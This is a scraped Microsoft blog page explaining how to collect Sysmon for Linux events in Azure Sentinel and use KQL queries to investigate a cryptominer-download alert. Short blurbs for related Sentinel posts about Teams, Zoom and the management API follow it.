Automating the deployment of Sysmon for Linux 🐧 and Azure Sentinel in a lab environment 🧪
Today, we celebrate25 years of Sysinternals,a set of utilities to analyze, troubleshoot and optimize Windows systems and applications.Also,as part of this special anniversary,we arereleasingSysmon for Linux,an open-sourcesystem monitor tooldevelopedto collect security eventsfrom Linux environmentsusingeBPF (Extended Berkeley Packet Filter)andsendingthem to Syslogfor easy consumption.Sysmon for Linux is built onalibrary also released today named sysinternalsEBPF which is built onlibbpfincluding a library of eBPF inline functions used as helpers. In this post, I will show you how to automatically deploy a research lab environment withanAzureSentinelinstance andafew Linux virtual machineswith Sysmon for Linuxalreadyinstalled and configured totake it foradrive and exploreitscoverage.
A Quick Guide on Using Sysmon for Linux in Azure Sentinel
Jessen Kurien - Microsoft Threat Intelligence Center Thanks to Kevin Sheldrake, Russell McDonald, Roberto Rodriguez and Ofer Shezaf for making this blog possible. Today,Linux isone of the fastest growing platforms on Azure. Linux based imagesformover 60% of Azure Marketplace Images. With Azure's support of common Linux distributions growingevery day,the sophistication ofcyber-attackstargeting Linuxcontinues to grow. As part of theSysinternals 25thanniversary,theSysinternalsteamreleased a newSysmontoolsupportingLinux.Sysmon forLinux isan open-sourceLinux system monitoring tool that helps with providing details on process creations, network connections,file creationsand deletions among other things.Sysmon for Linux isbased on aneBPF (Extended Berkeley Packet Filter)-based technologytargeted at in-kernel monitoring withoutmakingany changes to the kernel source code. By collecting the events it generates using Azure Sentineland subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network. Sysmon for Linux can be used toanalyzepre compromiseandpost compromiseactivityand whencorrelatedwith Azure SecurityCenter (ASC)/Azure Defender(AzD)Linux detectionsthishelpsdetecting the end-to-end attacker activity. In this blog post we will be taking a quick look at different log events made available by Sysmon for Linux that defenders can use to gather more information on the alerts triggered in Azure Sentinel. InAzureSentinel, alerts can be viewed under Threat Management>Incidents: A summarized graphical threat view is also available under the Security Operations Efficiency tab: Ifthere are potentialevents observed from sources that are malicious, Azure Sentinel will alert you on the map like below: Sysmonis supported by the Azure Sentinel and theAzure Sentinel Information Model(ASim), ensuring Sysmondatais analyzed by built-in analytics, and easy to query.It is important to enable Sysmon Event collection for parsing and it can be configured by using below steps: ConfigureSyslog collectionusing the Log Analytics agent. Deploy theSysmon ASim parser pack. Or better yet, allASimparsersin a single package. Enriching the Investigation of anAlert: For example, let’slookatone of thealerts‘Possible Cryptocoinminer download detected’that we had shown in the Incidents tab.Thisalert willtriggerany cryptocoinmining download activityobserved in the network. To investigate an alert like thisusing Azure Sentinel we need to use some of the eventsgeneratedby Sysmon.Below aresome ofthe eventsmadeavailablewithSysmon forLinuxrelease.It'simportant tonotethat you need to set the different events that you want in the Sysmon config.More details on the steps can be found hereunderOSSEM (Open Source Security Events Metadata)project.For this blog, we have configured Sysmon to collect Process Create and Network Connection eventsthat we have shown as part ofa quickalert analysis. 1 – Process Create The process creation event provides extended information about a newly created process. 3 – Network Connect The network connection event logs TCP/UDP connections on the machine. The event also contains the source and destination host namesIP (Internet Protocol)addresses, port numbers andIPv6 (Internet Protocol Version 6)status. 5 – Process Terminate The processterminateevent reports when a process terminates. It provides the UtcTime, ProcessGuid and ProcessId of the process. 9 – Raw Access Read The RawAccessRead event detects when a process conducts reading operations from the drive using the \\.\ denotation. This technique is often used by malware for data exfiltration of files that are locked for reading, as well as to avoid file access auditing tools. The event indicates the source process and target device. 10 – Access Process The process accessed event reports when a process opens another process, an operation that’s often followed by information queries or reading and writing the address space of the target process. 11 – File Create Filecreate operations are logged when a file is created or overwritten. This event is useful for monitoringAutoStartlocations, like the Startup folder, as well as temporary and download directories, which are common places malware drops during initial infection. 23 – File Delete A file was deleted. Helpful event when attackers will try to cover their tracks and even to find anomalies from high privilege monitoring machines. Once the events aresetupand being collected in Azure Sentinel,we can run a query like the one below to view all theprocess create logs that triggered around the time of the alert.We can see the download related tocrypto miningactivity along with other enumeration commands that can be used to learn moreaboutwhat attackers did andhelpreveal more details of the attack.Youcan always set the time span in the ‘Time Range’ column inAzureSentinel. vimProcessCreateLinuxSysmon | where Computer =~ "UBUNTU18ASCSYSMON" | summarize count () by Computer, CommandLine, Process Wecan also view thenetwork connection logs around the timeline of theattack by using a query belowtofindthesource of the attack andpotential enumerationactivitywithin the network.A similar approach can be taken to analyze attacker activity with the other logs sources made availableusing Sysmon for Linux. vimNetworkSessionLinuxSysmon | where Computer =~ "UBUNTU18ASCSYSMON"| summarize count () by Computer, Process, SrcIpAddr, DstIpAddr, Protocol If you would like to look at logs that triggered within a certain time span after or before thealert,a query like the one below might help in the analysis.Inthebelow query we have joined the ‘Possible Cryptocoinminer download detected’ alert with Process Create Linux Sysmon logs toreveal activitiesthat occurred within 1 minute of the alert. A query like this can be applied with other alerts and log sources as wellto investigateincidentspreviously shown under Incidents tab. SecurityAlert | where AlertName == "Possible Cryptocoinminer download detected" | summarize count () by WorkspaceSubscriptionId,CompromisedEntity= toupper(CompromisedEntity),TimeGenerated,AlertName | join kind=inner ( vimProcessCreateLinuxSysmon | project Computer = toupper(Computer), Timespan=TimeGenerated,CommandLine,Process ) on $left.CompromisedEntity==$right.Computer | extend TimeWindow = TimeGenerated + 01m | where Timespan between (TimeGenerated .. TimeWindow) | project TimeWindow,CompromisedEntity,AlertName,CommandLine,Process In our next blog post we will be covering how to use Sysmon for Linux to look for a specific MITRE ATT&CK technique and what that looks like inAzureSentinel. Please alsorefer toour blog post coveringSentinel2Go and how to set up Sysmon for Linuxwith it. Toconclude,the release of this toolis a significant step not only intheLinuxopen-sourcecommunityspacebut alsointhe advancements tocombat the rising sophistication of threats related to Linuxattacks. As you start using and testing Sysmon for Linux tool, we encourage you to provide feedback along with details in the Sysinternals GitHub page.Your feedback is criticalinMicrosoft's mission ofbuildingbetter protectionand defenseagainstcybercriminals. References& Relevant Reading: Sysinternals Utilities - Windows Sysinternals What is Azure Sentinel? | Microsoft Docs Azure-Sentinel:(github.com) Reference table for all security alerts in Azure Security CenterProtecting your Teams with Azure Sentinel
Recent events have forced many organizations (including Microsoft) to move to a work from home model for their users. In order to ensure theirusersremain connected and productive they are turning to productivity tools such as MicrosoftTeamsto host meetings, allowteamsto collaborate, and to help colleagues keep in touch. Moving to, or increasing usage of,Teamsmeans that the serviceshould be more of a focus for defenders than everdue to its critical role in communications and data sharing. In thisblogwe are going tofocus onhow we cancollectTeamsactivitylogswithAzure Sentinel, andstart hunting for suspicious activityin thatTeamsdata.Microsoft Sentinel API 101
Our Sentinel Management API just went GA! In this blog post we give you the 101 on the different APIs you can use to interact with Microsoft Sentinel. We'll look at how you can use them, when you should use them, what tools you can use to interact with them and how to authenticate to them.Monitoring Zoom with Azure Sentinel
In a recent blogwe talked about the explosion in usage we had seen with Microsoft Teams as the world has moved to working from home. However, Microsoft Teams is not the only application to see such as surge, Zoom is another remote productivity tool that has seen a massive increase in users, with more than 200 million daily meeting participants being reported in March. Just as Security OperationCenters (SOCs) need to monitor Microsoft Teams activity they also need to be able to secure and monitor other productivity applications such as Zoom. One of the great features of Azure Sentinel is its ability to ingest and analyze data from any source not just from Microsoft products. In this blog I will show you how you can collect logs from Zoom, ingest them into Azure Sentinel, and how a SOC team can start to hunt in the logs to find potentially malicious activity.
